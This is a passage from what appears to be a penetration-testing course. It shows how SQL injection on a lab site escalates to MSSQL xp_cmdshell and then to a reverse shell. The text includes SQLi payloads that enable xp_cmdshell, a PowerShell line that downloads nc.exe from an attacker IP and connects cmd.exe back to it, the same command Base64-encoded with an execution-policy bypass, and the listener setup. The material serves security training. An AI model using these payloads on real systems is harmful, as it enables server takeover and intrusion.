Remote Code Execution

Scenario

If we have an SQL injection as the sa user, or if our user has the necessary permissions, we can get MSSQL to run arbitrary commands for us. In this section, we'll use the Aunt Maria's Donuts example once again to achieve a reverse shell.

Verifying Permissions

Before anything else, we want to verify if we can use xp_cmdshell. We can check if we are running as sa with the following query:

IS_SRVROLEMEMBER('sysadmin');

The query asks the server if our user has the sysadmin role or not, returning a 1 if yes, and a 0 otherwise. In the example of Aunt Maria's Donuts, we can use the following payload:

maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--

This should result in a taken status, indicating we have the sysadmin role.

Enabling xp_cmdshell

The procedure which allows us to execute commands is xp_cmdshell. By default it executes commands as nt service\mssqlserver unless a proxy account is set up.

Since xp_cmdshell is a target for malicious actors, it is disabled by default in MSSQL. Luckily it isn't hard to enable (if we are running as sa). First, we need to enable advanced options. The commands to do this are:

EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

In the case of Aunt Maria's Donuts, the payload will look like this:

';exec sp_configure 'show advanced options','1';reconfigure;--

URL-Encode, inject, and we should get a regular response from the server if it worked correctly:

Next, we will enable xp_cmdshell (it is an advanced option, so make sure to run this previous query first). The commands are:

EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

The payload (before URL-Encoding) is:

';exec sp_configure 'xp_cmdshell','1';reconfigure;--

And once again a successful injection should return a regular response:

At this point, xp_cmdshell should be enabled, but just to make sure we can ping ourselves a couple of times. The command to do this looks like this:

EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

And as a payload like this:

';exec xp_cmdshell 'ping /n 4 192.168.43.164';--

Make sure to start tcpdump on the correct interface "(which would be tun0 for Pwnbox)" before running the payload, and you should see 4 pairs of ICMP request/reply packets:

[!bash!]$ sudo tcpdump -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
<SNIP>
07:41:13.167468 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 6, length 40
07:41:13.167500 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 6, length 40
07:41:14.218855 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 7, length 40
07:41:14.218928 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 7, length 40
07:41:15.190453 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 8, length 40
07:41:15.190515 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 8, length 40
07:41:16.209580 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 9, length 40
07:41:16.209615 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 9, length 40
<SNIP>
^C
29 packets captured
29 packets received by filter
0 packets dropped by kernel

The website should once again give a regular response.

Reverse Shell

At this point, we have successfully turned our SQLi into RCE. Let's finish off with a proper reverse shell. There are many ways to do this; in this case, we chose to use a Windows netcat binary to run cmd.exe on a connection.

The (powershell) command we want the server to run looks like this. First, we download nc.exe from our attacker machine, and then we connect to port 9999 on our attacker machine and run cmd.exe.

(new-object net.webclient).downloadfile("http://192.168.43.164/nc.exe", "c:\windows\tasks\nc.exe");
c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;

To avoid the hassle of quotation marks, encoding PowerShell payloads is prefered. One useful tool to do so is from Raikia's Hub, however, it is known that from time to time it goes offline. As penetration testers, it is important to know how to perform such tasks without relying on any external tools. To encode the payload, we need to first convert it to UTF-16LE (16-bit Unicode Transformation Format Little-Endian) then Base64-encode it. We can use the following Python3 one-liner to encode the payload, replacing PAYLOAD with the actual PowerShell one:

python3 -c 'import base64; print(base64.b64encode((r"""PAYLOAD""").encode("utf-16-le")).decode())'

[!bash!]$ python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://192.168.43.164/nc.exe", "c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'

KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADEANgA0AC8AbgBjAC4AZQB4AGUAIgAsACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIgApADsAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIAAtAG4AdgAgADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADYANAAgADkAOQA5ADkAIAAtAGUAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdABlAG0AMwAyAFwAYwBtAGQALgBlAHgAZQA7AA==

With the encoded payload, we need to pass it to powershell, setting the Execution Policy to bypass along with the -enc (encoded) flag. The command we will want the server to execute becomes:

exec xp_cmdshell 'powershell -exec bypass -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADEANgA0AC8AbgBjAC4AZQB4AGUAIgAsACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIgApADsAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIAAtAG4AdgAgADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADYANAAgADkAOQA5ADkAIAAtAGUAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdABlAG0AMwAyAFwAYwBtAGQALgBlAHgAZQA7AA=='

Before we run the command, we need to download and host nc.exe on our machine for the server to download. You can download a compiled version from here. Put it in any directory and then start a temporary HTTP server on port 80 with Python like this:

[!bash!]$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Once the HTTP server is listening, start a netcat listener with nc -nvlp 9999 and inject the payload! We should get a reverse (cmd) shell.

[!bash!]$ nc -nvlp 9999
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.43.156.
Ncat: Connection from 192.168.43.156:58085.
Microsoft Windows [Version 10.0.19043.1826]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>